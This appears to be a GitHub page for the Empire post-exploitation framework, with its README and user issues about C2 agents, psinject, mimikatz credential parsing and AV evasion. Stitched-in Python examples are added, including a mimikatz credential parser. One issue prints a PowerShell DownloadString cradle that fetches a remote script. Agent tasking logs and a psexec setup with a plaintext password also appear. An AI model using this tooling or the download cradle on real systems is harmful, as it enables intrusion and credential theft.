
empire's Introduction

Empire

This project is no longer supported

Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.

Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with heavily here and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to properly cite existing or prior work, please let us know.

Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior.

Feel free to join us on Slack! https://bloodhoundgang.herokuapp.com

Install

To install, run the sudo ./setup/install.sh script, or use the corresponding Docker image: docker pull empireproject/empire.

There's also a quickstart here and full documentation here.

Quickstart

Check out the Empire wiki for instructions on getting started with Empire.

Contribution Rules

Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.

  • Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative.
  • Submit pull requests to the dev branch. After testing, changes will be merged to master.
  • Depending on what you're working on, base your module on ./lib/modules/powershell_template.py or ./lib/modules/python_template.py. Note that for some modules you may need to massage the output to get it into a nicely displayable text format with Out-String.
  • Cite previous work in the 'Comments' module section.
  • If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate data/module_source/* directory and pulling the script contents into the module on tasking.
  • Use approved PowerShell verbs for any functions.
  • PowerShell Version 2 compatibility is STRONGLY preferred.
  • TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
  • For additional guidelines for your PowerShell code itself, check out the PowerSploit style guide.

empire's People

Contributors

bneg, caleb-sfdcsec, ceramicskate0, cobbr, dakotanelson, dchrastil, enigma0x3, etn-security, harmj0y, ihamburglar, import-au, jamcut, jarrodcoulter, kevin-robertson, killswitch-gui, leoloobeek, matthewneeley, monoxgas, mr64bit, n00py, nnh100, pierrickv, rvrsh3ll, s0lst1c3, secdev02, sixdub, stufus, thepiratewhosmellsofsunflowers, tristandostaler, xorrior


empire's Issues

New psinject always injects ps2

I don't want to annoy, but I'm just writing to let you know. For me it's not a big deal.
There is a new issue with the new psinject: the injection always injects ps2 even if the computer has ps4.

ipWhitelist parsing in do_set()

The do_set() command in empire.py sets ipblacklist rather than ipWhitelist when attempting to load the whitelist from a file.

Empire doesn't work in non-English environments

When I use the latest empire version on kali 2.0, I get an agent, but I can't do anything with it. No modules work, not even trollsploit/message.
Target=(Windows 8.1, AV disabled, no firewall, language=Dutch)

AV blocking empire agents

Hey there,

I've been experimenting a bit with Empire and in my testing I was trying to run it with Kaspersky Internet Security 2016 enabled.
Apparently KIS 2016 is limiting the size of the scripts downloaded by System.Net.WebClient to 14409 bytes (as far as I could tell by manual testing), so if I deactivate it, everything goes smoothly but if I enable it, I get:

    Exception happened during processing of request from ('192.168.1.94', 49762)
    Traceback (most recent call last):
      File "/usr/lib/python2.7/SocketServer.py", line 295, in _handle_request_noblock
        self.process_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request
        self.finish_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__
        self.finish()
      File "/usr/lib/python2.7/SocketServer.py", line 716, in finish
        self.wfile.close()
      File "/usr/lib/python2.7/socket.py", line 279, in close
        self.flush()
      File "/usr/lib/python2.7/socket.py", line 303, in flush
        self._sock.sendall(view[write_offset:write_offset+buffer_size])

    error: [Errno 32] Broken pipe
    ----------------------------------------

on the empire C&C side and on the cmd.exe running the agent (e.g. launcher.bat), I get a hung console.

From my testing, doing:

    $wc = New-Object System.Net.WebClient;
    $wc.downloadstring("http://arandomhost.com/mycode.ps1");

works as long as the script is under 14409 bytes. If it's larger than 14409 bytes OR you replace HTTP with HTTPS on the downloadstring URL, you get

    Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: An unexpected error occurred on a send."
    At line:1 char:19
    + $wc.downloadstring <<<< ("https://arandomhost.com/mycode.ps1");
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException

It's also noteworthy that KIS throws NO alerts when blocking powershell downloads and as far as I could tell, there are no KIS threat log entries related to these events.
I'm not sure how to fix this, because powershell is listed as a "Trusted" application by KIS.
If KIS is blocking all HTTPS traffic by powershell (yes, even when injected into another process via PSInject) and due to Empire's whole HTTPS foundation, it's going to be tricky to bypass.
P.S. - Doing $wc.downloadstring() to servers with valid SSL certificates (i.e. Github) also fails with the same error.

Missing dependency in installer script

Empire requires the m2crypto python library, but the installer does not add it. In addition, pip/easy_install both require swig (apt-get install swig) in order to build m2crypto dependencies

FIPS enforcement woes

Testing against the a FIPS enforced system produces a condition whereby agent.ps1 doesnt initialize properly due to restrictions on algorithms used (HMACMD5).

https://support.microsoft.com/en-us/kb/811833

-- Changing registry key fixed problem... but that wont be kosher :)

Running agent.ps1 in the current master:

    New-Object : Exception calling ".ctor" with "0" argument(s): "This implementation
    is not part of the Windows Platform FIPS validated cryptographic algorithms."
    At line:373 char:31
    +         $hmac = New-Object <<<<  System.Security.Cryptography.HMACMD5;
        + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodInvocationException
        + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

    Property 'Key' cannot be found on this object; make sure it exists and is settable.
    At line:374 char:19
    +         $hmac. <<<< Key = $encoding.GetBytes($SessionKey);
        + CategoryInfo          : InvalidOperation: (Key:String) [], RuntimeException
        + FullyQualifiedErrorId : PropertyNotFound

    You cannot call a method on a null-valued expression.
    At line:375 char:42
    +         $expected = $hmac.ComputeHash <<<< ($inBytes);
        + CategoryInfo          : InvalidOperation: (ComputeHash:String) [], RuntimeException
        + FullyQualifiedErrorId : InvokeMethodOnNull

    Compare-Object : Cannot bind argument to parameter 'DifferenceObject' because it is null.
    At line:376 char:33
    +         if (@(Compare-Object <<<<  $mac $expected -sync 0).Length -ne 0){
        + CategoryInfo          : InvalidData: (:) [Compare-Object], ParameterBindingValidationException
        + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.CompareObjectCommand

Relevant logs and behavior observed:

agent.log
2015-08-27 02:17:38 :
[+] Agent ZTG4SEN2GCWYSZXN now active:
ps_version 2
old_uris None
jitter 0.0
servers None
internal_ip 10.1.0.129
working_hours
session_key [redacted]
children None
checkin_time 2015-08-27 02:17:38
hostname WIN764
delay 5
uris /admin/get.php,/news.asp,/login/process.jsp
username HAXME\testme4
kill_date
parent None
process_name powershell
listener http://10.1.0.1:8082/
sessionID ZTG4SEN2GCWYSZXN
process_id 3476
os_details Microsoft Windows 7 Enterprise
lost_limit 60
ID 1
name ZTG4SEN2GCWYSZXN
external_ip 10.1.0.129
headers
user_agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time 2015-08-27 02:17:38
high_integrity 0

2015-08-27 02:17:55 :
Tasked agent to run command ls

2015-08-27 02:18:01 :
Tasked agent to run command ps

2015-08-27 02:18:02 :
Tasked agent to run command tasklist

2015-08-27 02:18:03 :
Tasked agent to run command getpid

2015-08-27 02:18:04 :
Tasked agent to run command whoami

2015-08-27 02:18:06 :
Tasked agent to run shell command dir

2015-08-27 02:18:09 :
Tasked agent to run shell command whoami /all

debuglog:
2015-08-27 02:15:41 Empire : [*] Empire starting up...
2015-08-27 02:16:27 EmpireServer : [!] Error starting listener on port 8081: [Errno 98] Address already in use
2015-08-27 02:16:40 EmpireServer : [*] Initializing HTTP server on 8082
2015-08-27 02:17:38 HttpHandler : [*] /index.asp requested from None at 10.1.0.129
2015-08-27 02:17:38 Agents : [*] Sending stager (stage 1) to 10.1.0.129
2015-08-27 02:17:38 HttpHandler : [*] Post to /index.jsp from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [*] Agent ZTG4SEN2GCWYSZXN from 10.1.0.129 posted to public key URI
2015-08-27 02:17:38 Agents : [*] Agent ZTG4SEN2GCWYSZXN from 10.1.0.129 posted valid RSA key
2015-08-27 02:17:38 HttpHandler : [*] Post to /index.php from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [*] Sending agent (stage 2) to ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [+] Initial agent ZTG4SEN2GCWYSZXN from 10.1.0.129 now active
2015-08-27 02:17:43 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:48 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:53 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:55 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:17:58 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:01 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:02 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:03 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:04 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:04 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:06 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:09 Agents : [*] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:10 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:15 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:20 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:25 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:30 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:35 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:40 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:45 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:50 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:55 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:00 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:05 HttpHandler : [*] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:10 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:15 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:20 HttpHandler : [*] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:25 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
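The root cause in the FIPS report above is the first error: the agent constructs System.Security.Cryptography.HMACMD5, which a FIPS-enforcing Windows host refuses because MD5 is not on the approved algorithm list, and every later line ($hmac.Key, ComputeHash, Compare-Object) then fails on a null object. Flipping the registry key disables enforcement rather than fixing the agent. The following is an added example, not Empire's own code, sketching the message-authentication step with a FIPS-approved construction (HMAC-SHA256, truncated tag, constant-time comparison) in Python. The 10-byte tag length, the key-derivation step and the message framing are assumptions made for illustration; the real agent/server framing is not reproduced.

```python
import hmac
import hashlib

# Assumption: a 10-byte truncated tag is appended to every message (illustrative only).
TAG_LEN = 10


def derive_session_key(shared_secret: bytes, salt: bytes) -> bytes:
    """Derive a fixed-length MAC key with PBKDF2-HMAC-SHA256.

    The agent excerpt feeds $SessionKey straight into the HMAC; this KDF step is an
    assumption added for illustration, not something the page shows.
    """
    return hashlib.pbkdf2_hmac("sha256", shared_secret, salt, 10_000, dklen=32)


def mac_message(key: bytes, payload: bytes) -> bytes:
    """Append a truncated HMAC-SHA256 tag.

    SHA-256 is a FIPS-approved hash; MD5 is not, which is exactly why the
    HMACMD5 constructor is rejected on a FIPS-enforcing host.
    """
    tag = hmac.new(key, payload, hashlib.sha256).digest()[:TAG_LEN]
    return payload + tag


def verify_message(key: bytes, blob: bytes):
    """Return the payload if the trailing tag is valid, otherwise None.

    hmac.compare_digest keeps the comparison time independent of where the first
    mismatching byte sits; the agent excerpt compares with Compare-Object, which
    short-circuits and is not constant-time.
    """
    if len(blob) < TAG_LEN:
        return None
    payload, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


def roundtrip_demo():
    """Both sides of the exchange with a constructed key and a constructed tasking string."""
    key = derive_session_key(b"constructed-shared-secret", b"constructed-salt")
    tasked = mac_message(key, b"TASK_SHELL whoami /all")    # server -> agent
    accepted = verify_message(key, tasked)                   # agent checks the tag before acting
    tampered = tasked[:5] + bytes([tasked[5] ^ 0xFF]) + tasked[6:]
    rejected = verify_message(key, tampered)                 # None: payload no longer matches tag
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = roundtrip_demo()
    print("accepted:", ok)
    print("tampered rejected:", bad is None)
```

Anything that verifies the tag must do so before acting on the payload, and a failed verification should be treated as a dropped message rather than an error that leaks timing or content back to the sender.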

Credentials truncated in Creds DB

Hey guys,

First of all, thank you for this tool. I have been using it pretty frequently since its release and I've been finding it quite useful. However, I did notice something funky with the credential reporting. When running the "mimikatz" command from an agent context, all the credentials are reported correctly, as expected.

[screenshot]

However, when running the "creds" command the same password in the above image is reported incorrectly. I didn't dive into the code to see whats really happening, but I thought maybe it was truncating the output due to the ":" in the password.

[screenshot]

Unfortunately, I can't provide too much information as this is from a client engagement, however if you need any assistance recreating the issue, I'll provide whatever help I can.
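The poster's hypothesis, a field split on ":" that keeps only the first piece after the separator, is easy to check against mimikatz-style output. This is an added example in Python and not Empire's own credential parser: a naive split beside a parser that splits each "* Key : value" line on the first colon only, grouped per provider block. The sample block, the password in it, and the provider-block handling are constructed for illustration.

```python
import re

# Constructed sample in the shape of a mimikatz logonpasswords block
# (not real output, and not a real password).
SAMPLE = """\
Authentication Id : 0 ; 123456 (00000000:0001e240)
Session           : Interactive from 1
User Name         : testme4
Domain            : HAXME
        wdigest :
         * Username : testme4
         * Domain   : HAXME
         * Password : Sup3r:Secr3t:1
        kerberos :
         * Username : testme4
         * Domain   : HAXME.LOCAL
         * Password : (null)
"""

# "* Key : value" lines; the value group deliberately swallows any further colons.
FIELD_RE = re.compile(r"^\s*\*\s*(\w+)\s*:\s?(.*)$")


def parse_field_naive(line):
    """The suspected bug: split on every ':' and keep only the second piece."""
    parts = line.split(":")
    return parts[0].strip(" *"), parts[1].strip()


def parse_field(line):
    """Split on the first ':' only, so colons inside the password survive."""
    m = FIELD_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(2).rstrip()


def parse_credentials(text):
    """One dict per provider block (wdigest, kerberos, ...) that carries a usable password."""
    creds, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        # provider header such as "wdigest :" opens a new block
        if stripped.endswith(":") and not stripped.startswith("*"):
            current = {"provider": stripped[:-1].strip()}
            creds.append(current)
            continue
        field = parse_field(line)
        if field and current is not None:
            key, value = field
            current[key.lower()] = value
    return [c for c in creds if c.get("password") not in (None, "", "(null)")]


if __name__ == "__main__":
    print("naive :", parse_field_naive(" * Password : Sup3r:Secr3t:1"))
    print("robust:", parse_field(" * Password : Sup3r:Secr3t:1"))
    for cred in parse_credentials(SAMPLE):
        print(cred)
```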

Double Quotes in add_sid_history module

Not sure how I'm supposed to put quotes in modules, is there a trick to it?

(Empire: persistence/misc/add_sid_history) > set Groups "Domain Admins"
(Empire: persistence/misc/add_sid_history) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/misc/add_sid_history) >
Job started: Debug32_vzw3x

Hostname: DC1.sittingduck.info / authority\system-authority\system
  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 23 2015 23:05:23)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 16 modules * * */


mimikatz(powershell) # misc::addsid notanadmin
ERROR kuhl_m_misc_addsid ; It requires at least 2 args

mimikatz(powershell) # Domain
ERROR mimikatz_doLocal ; "Domain" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
        markruss  -  Mark about PtH

mimikatz(powershell) # Admins
ERROR mimikatz_doLocal ; "Admins" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
        markruss  -  Mark about PtH
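The transcript shows the option value being split on whitespace: mimikatz first receives misc::addsid with too few arguments, then "Domain" and "Admins" arrive as separate commands. An added example (not Empire's own command parser) of a set-command parser that honours double quotes via shlex, next to the whitespace-only split that reproduces the symptom; the command shape and the function names are assumptions.

```python
import shlex


def parse_set_command(line):
    """Parse 'set <Option> <value>' honouring shell-style quoting.

    Returns (option, value). Words after the option name are re-joined with single
    spaces, so both 'set Groups "Domain Admins"' and 'set Groups Domain Admins'
    yield the value 'Domain Admins'.
    """
    try:
        parts = shlex.split(line)
    except ValueError as exc:  # unbalanced quotes
        raise ValueError("unbalanced quoting in %r: %s" % (line, exc))
    if len(parts) < 3 or parts[0].lower() != "set":
        raise ValueError("expected: set <Option> <value>, got %r" % line)
    return parts[1], " ".join(parts[2:])


def parse_set_command_naive(line):
    """Whitespace-only splitting: the quote character becomes part of the value and
    every word after the first is dropped, which is the behaviour the transcript shows."""
    parts = line.split()
    return parts[1], parts[2]


if __name__ == "__main__":
    print(parse_set_command_naive('set Groups "Domain Admins"'))
    print(parse_set_command('set Groups "Domain Admins"'))
```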

enhancement: clear out agents with a checkin_time older than X

I don't seem to be able to give this a label, but to be clear this is a feature request/enhancement.

It would be useful to me to have the ability to issue a command in the agents context to remove agents with a checkin_time older than X.

Ultimately I would like to be able to automatically assign my agent(s) some metadata in the agent list related to how long since they last checked in, something along the lines of a staleness scale. The next logical progression would be performing batch operations (killing them, running a module on them, etc) on collections of agents using their staleness as a selector.

DCSync not working

All I get is a "Job started: Debug32_randomchars"

Is there somewhere I can look for logging of why it's not working?

Auto run on new session

It'd be nice to have a way to automatically run a script or two when a new session comes in. Is there any way to do this already?

Module error running Empire

Hi, on initial install Empire was working fine; not sure what has changed or if it's a Kali/Python issue.
I've checked that I have the latest pull from git and also tried googling with no luck. A point in the right direction would be greatly appreciated:

root@kali:/opt/Empire# ls
changelog data empire lib LICENSE README.md setup
root@kali:/opt/Empire# ./empire
Traceback (most recent call last):
File "./empire", line 6, in
from lib.common import empire
File "/opt/Empire/lib/common/empire.py", line 15, in
from pydispatch import dispatcher
ImportError: No module named pydispatch
root@kali:/opt/Empire# python -V
Python 2.7.3
root@kali:/opt/Empire# pip install pydispatch
Requirement already satisfied (use --upgrade to upgrade): pydispatch in /usr/local/lib/python2.7/dist-packages
Requirement already satisfied (use --upgrade to upgrade): colorama>=0.2.7 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Requirement already satisfied (use --upgrade to upgrade): six>=1.5.2 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Cleaning up...
root@kali:/opt/Empire# pip install pydispatch --upgrade
Requirement already up-to-date: pydispatch in /usr/local/lib/python2.7/dist-packages
Requirement already up-to-date: colorama>=0.2.7 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Requirement already up-to-date: six>=1.5.2 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Cleaning up...
root@kali:/opt/Empire#

Powershell without Powershell

This is more of a question. Just curious. In testing within an environment where powershell is blacklisted, I can get the agent deployed via reflective dll injection. However, I have had limited success with some of the modules. For example, screenshot works but keylogger does not (I get software restriction policy block event in eventlog for powershell.exe). Just curious what modules were "powershell without powershell" friendly. Is Empire a viable solution in a "powershell blacklisted" environment? Thanks!

Cert.sh not in 'data'

According to the site the cert.sh should be under data: The provided ./data/cert.sh script will generate a self-signed cert and place it in ./data/empire.pem. - it's under the setup directory

Easy way to load external modules

Much like Metasploit has their .msf4/modules directory, it would be nice if there was a way for custom modules to be loaded outside of Empire so I don't have to dirty up my Empire directory with all my janky powershell code ;-)

Dll stager with MSF

Hi Guys
I'm finding issues using the generated dll payload with msf, I've generated the dll payload and set up a listener within Empire.
I've setup msf to deploy the dll via psexec, below are the msf options and the error message I receive, regardless of the stager being x86 or x64 and the OS being x86 or x64

Any help if I'm being dumb and doing the wrong thing or I can help in any way with debugging.

Dave

Module options (exploit/windows/smb/psexec):

    Name                  Current Setting  Required  Description
    ----                  ---------------  --------  -----------
    RHOST                 192.168.0.110    yes       The target address
    RPORT                 445              yes       Set the SMB service port
    SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
    SERVICE_DISPLAY_NAME                   no        The service display name
    SERVICE_NAME                           no        The service name
    SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
    SMBDomain             .                no        The Windows domain to use for authentication
    SMBPass               Pa55w0rd2013     no        The password for the specified username
    SMBUser               dave             no        The username to authenticate as

Payload options (windows/dllinject/reverse_http):

    Name      Current Setting    Required  Description
    ----      ---------------    --------  -----------
    DLL       /tmp/launcher.dll  yes       The local path to the Reflective DLL to upload
    EXITFUNC  process            yes       Exit technique (Accepted: , , seh, thread, process, none)
    LHOST     192.168.0.243      yes       The local listener hostname
    LPORT     443                yes       The local listener port

Exploit target:

    Id  Name
    --  ----
    0   Automatic

2015-08-09 21:35:47 +0100 S:0 J:0 IP:192.168.0.243 msf exploit(psexec) > exploit

[*] Started HTTP reverse handler on http://0.0.0.0:443/
[*] Connecting to the server...
[*] Authenticating to 192.168.0.110:445 as user 'dave'...
[*] Uploading payload...
[*] Created \ngPAKreH.exe...
[+] 192.168.0.110:445 - Service started successfully...
[*] Deleting \ngPAKreH.exe...
[*] 192.168.0.110:1251 (UUID: 7ba205fb173a7163/x86=1/windows=1/2015-08-09T20:35:59Z) Staging Native payload ...
[-] Exception handling request: wrong number of arguments (1 for 0)

PowerShell Shell

Hi Guys,

this isn't an issue more me asking a question about Empire and your plans for it.
Me and a friend wrote and got this into Metasploit; https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/
And one of the guys at Trusted Sec wrote about it too - https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/

My thoughts were that the shell might be useful inside of Empire.
The main part of the shell is really just a powershell script that Metasploit deploys as a payload.
Would this fit with your plans for Empire?

Thanks

Dave

Feature Request to enhance ability to inject agent into other processes

When a credential is discovered by keylogging, searching Netlogon or another method, I would like an easy way to put that into the credential store manually. OR
allow the user to optionally specify credentials to be used for lateral/invoke_psexec, manage/psinject as well as manage/inject_wmi. This would also allow you to specify a credential and spread to targets where only port 445 is accessible.

Also, please allow ComputerName to be an optional field for manage/psinject. I popped a non-administrator, keylogged the local admin, then wanted to specify the admin creds and manage/psinject into the same host to privilege escalate the agent. However, if you use Invoke-WmiMethod (as I am sure this method does) and specify the -ComputerName argument you will get a "User credentials cannot be used for local connections" error. (And remotely executing it to escalate isn't always an option because of UAC LocalAccountTokenFilterPolicy.)

Have I told you lately that you guys are awesome? Thanks!

on windows

I wanted to run this project under Windows.

Although it is strange, it is valuable.

I like Empire, it is really good.

Keylogger Module

Thanks for the great tool!
I tested the keylogger module today and got a lot of incorrect characters.
Windows was running in VirtualBox and the keyboard was German.
Empire was running in Kali, but virtualized with Parallels Desktop for Mac.
Maybe that's the problem?
My input was twitter.com and I'm getting itter.com,
or the input was google.com and I was getting googgle.com.

socket.gethostbyname(socket.gethostname()) can throw exception

https://github.com/PowerShellEmpire/Empire/blob/3cedb106a999c5f443e68952f65abb4b44ea3033/lib/common/helpers.py#L364

socket.gethostbyname(socket.gethostname())

Can throw:

socket.gaierror: [Errno -2] Name or service not known

Best case is to probably wrap in try/except and proceed into the block of logic below:

    if ip.startswith("127.") and os.name != "nt":
        interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
        for ifname in interfaces:
            try:
                ip = get_interface_ip(ifname)
                if ip != "":
                    break
            except:
                print "Unexpected error:", sys.exc_info()[0]
                pass
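Added example, not the project's helpers.py: the same lookup wrapped in try/except as the poster suggests, plus a second source that asks the kernel which address the default route would use (so no fixed list of interface names is needed), and a selector that skips loopback answers and falls back to 127.0.0.1. The probe address, the fallback order and the function names are assumptions; nothing is sent on the wire.

```python
import ipaddress
import socket

LOOPBACK = "127.0.0.1"


def is_ipv4(text):
    """True when text is a well-formed dotted-quad IPv4 address."""
    try:
        ipaddress.IPv4Address(text)
        return True
    except (ValueError, TypeError):
        return False


def ip_from_hostname():
    """The call the issue reports as raising socket.gaierror; failures become None."""
    try:
        return socket.gethostbyname(socket.gethostname())
    except socket.gaierror:
        return None


def ip_from_default_route(probe="10.255.255.255"):
    """Ask the kernel which source address it would pick toward a non-local address.

    connect() on a UDP socket sends nothing; it only selects a route and binds the
    local side, so getsockname() reveals the outbound interface address.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect((probe, 1))
        return sock.getsockname()[0]
    except OSError:  # no route, no interfaces, or a sandboxed network namespace
        return None
    finally:
        sock.close()


def pick_ip(candidates):
    """First usable, non-loopback IPv4 address from an iterable of strings/None,
    falling back to 127.0.0.1 when none qualifies."""
    for cand in candidates:
        if cand and is_ipv4(cand) and not cand.startswith("127."):
            return cand
    return LOOPBACK


def get_ip_address():
    """Lazy candidate sources: a later probe only runs if the earlier ones were unusable."""
    return pick_ip(source() for source in (ip_from_hostname, ip_from_default_route))


if __name__ == "__main__":
    print(get_ip_address())
```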

PSinject fails - does not return an agent connection when injecting into SYSTEM process

Testing Empire against Windows 7 Enterprise 64-bit. The initial PowerShell agent works fine and I get a PowerShell agent running as a domain user that's a member of the local Administrators group on this system. powerup/allchecks works fine against that agent and confirms I have local admin rights, showing "Current user already has local administrative privileges". Running bypassuac works fine and reports "Not in a medium integrity process", and bypassuac_wscript reports "You are already elevated", so it seems I already have the appropriate high integrity privileges. Running ps works fine as well; however, when I try to psinject into a listed process with "nt authority/system" privileges, psinject starts the job, but I never get a call back with a new agent. Same result if I psinject into another process that my user owns. I seem to have all the appropriate .NET pre-reqs in the reg entry that was listed in another thread: v2.0.x, v3.0, v3.5, v4, & v4.0.

I added code to bypassuac (Invoke-BypassUAC) to provide an additional message in the console if "whoami /groups" has a "High Mandatory Level" group permission and indeed it does. I believe this is also indicated by the asterisk prepending the username in the agents view, which it is as well. In that case, psinject (Invoke-PSInject) should have sufficient privileges to function, however when it executes against an agent, it starts the job, but nothing comes back. I've tried this with a few different test Win7 Enterprise 64-bit targets with same result.

Any ideas?

Agent recognition

Hello, at first, let me thank you, this is very nice software to play with.
I had an idea that it might be quite easy to add some client recognition features; it's quite annoying that every time PowerShell starts it creates a new agent.
I think it should be possible to write a name to the registry and then check that entry every time PowerShell (or another infected program) runs and send it to the Empire master.
Would it be possible?

DCSync not working Part 2

#40 for reference

After discussion with @gentilkiwi found out there is a /dc option for DCsync that works perfectly.

So:
Feature: add the /dc option for the DCSync module but leave it as not required
Bug: Figure out why the Job never finishes and just hangs in the job queue

Feature Request - Add creds manually

I can't see a way to add credentials manually (if retrieved through other means)

Will look at the database to see if I can add manually through there in the mean time

empire notification

Empire does not give a notification in case an agent dies or stops calling home,
as msfconsole, the pupy remote admin tool and Cobalt Strike do.
It will be good to know when an agent dies,
so I don't send commands to dead agents and, when we don't get a response, start thinking I have been blocked or that it's the network.
